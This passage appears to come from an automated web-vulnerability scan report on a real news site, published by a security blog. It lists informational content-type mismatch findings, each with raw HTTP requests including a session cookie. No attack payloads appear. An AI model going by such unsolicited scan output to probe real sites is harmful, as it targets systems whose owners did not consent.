The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /common/js/aggregate.js?s=main|thePlatform/util|thePlatform/swfobject|tv_listing&menz=1 HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:50 GMT
Connection: close
Content-Length: 90989

function bigShowHide(inputString,direction){
   var pairs = inputString.split(",");
   var directions = direction.split(",");
   for (var i=0; i<pairs.length; i++){
       if(directions[i]){
           direction = direc
...[SNIP]...

8.2. http://www.necn.com/common/js/jqueries/jquery.tools.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.necn.com
Path:   /common/js/jqueries/jquery.tools.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /common/js/jqueries/jquery.tools.min.js HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=7341
Date: Fri, 11 Mar 2011 12:51:52 GMT
Connection: close
Content-Length: 19779

/*
* jQuery Tools 1.2.3 - The missing UI library for the Web
*
* [tabs, tabs.slideshow, tooltip, tooltip.slide, tooltip.dynamic, scrollable, scrollable.autoscroll, scrollable.navigator, overlay, o
...[SNIP]...

8.3. http://www.necn.com/template_images/main_main_1034_background.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.necn.com
Path:   /template_images/main_main_1034_background.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /template_images/main_main_1034_background.jpg HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8; __qca=P0-1553828670-1299847997445

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 05 May 2010 19:41:35 GMT
ETag: "159fc095-1fb7-38319c0"
Accept-Ranges: bytes
Content-Length: 8119
Content-Type: image/jpeg
Date: Fri, 11 Mar 2011 12:51:53 GMT
Connection: close

GIF89a........_..Z..l..]..v..X.....W..Z..X..U.
q.
n.
x..Z..].
]..^..i..V.._..h..W..f.
U..t.....y..p..a..Q..V..h.
b.
Z.
i..i.
f.....|.....q..n.
t..r.....f..J..`..W..U..R.
X..n..n..f..\.._.....w..Z.
P..
...[SNIP]...

8.4. http://www.necn.com/template_images/main_main_1872_background.1291914844.jpg  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.necn.com
Path:   /template_images/main_main_1872_background.1291914844.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /template_images/main_main_1872_background.1291914844.jpg HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8; __qca=P0-1553828670-1299847997445

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 09 Dec 2010 17:14:04 GMT
ETag: "10fec21a-1fb7-5d5b4f00"
Accept-Ranges: bytes
Content-Length: 8119
Content-Type: image/jpeg
Date: Fri, 11 Mar 2011 12:51:54 GMT
Connection: close

GIF89a........_..Z..l..]..v..X.....W..Z..X..U.
q.
n.
x..Z..].
]..^..i..V.._..h..W..f.
U..t.....y..p..a..Q..V..h.
b.
Z.
i..i.
f.....|.....q..n.
t..r.....f..J..`..W..U..R.
X..n..n..f..\.._.....w..Z.
P..
...[SNIP]...

Report generated by XSS.CX Research Blog at Fri Mar 11 06:57:05 CST 2011.